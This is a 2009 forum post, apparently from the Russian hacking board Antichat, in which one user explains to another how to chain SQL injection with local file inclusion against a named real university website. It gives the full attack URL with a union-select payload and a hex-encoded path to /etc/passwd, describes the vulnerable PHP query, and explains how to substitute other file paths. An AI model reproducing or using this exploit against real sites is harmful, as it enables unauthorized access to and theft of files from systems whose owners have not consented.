21.10.2009, 16:56
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от Strilo4ka
а по поводу include что то не понятно мне пока...
Сообщение от AFoST
о ептыть тут еще инклуд есть
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database (),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F7061737 37764,3,4,5--+-&lan=ukr
в php-файле, который исполняется есть строчки примерно такие:
PHP код:
mysql_query("select pole1,pole2 from table1 where id_doc=".$_GET);
далее
$pole2 = присваивается значение 2 поля.
после этого идёт локаьный инклуд файла
Мы запросом
PHP код:
http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr
делаем так, чтобы основной запрос вернул ложь, а UNION SELECT запрос вернул данные которые нам нужны.
В поле, значение которого потом инклудится, вносим HEX значение строки, так как с ковычками не получилось.
PHP код:
0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764
это равно
../../../../../etc/passwd
соответственно, подставляя во 2 поле в sql-injection путь до искомого файла, он инклудится.
Что непонятно - спрашивай.
__________________
Появляюсь редко. Важные дела в реале.
Последний раз редактировалось AFoST; 21.10.2009 в 16:58..
|
|
|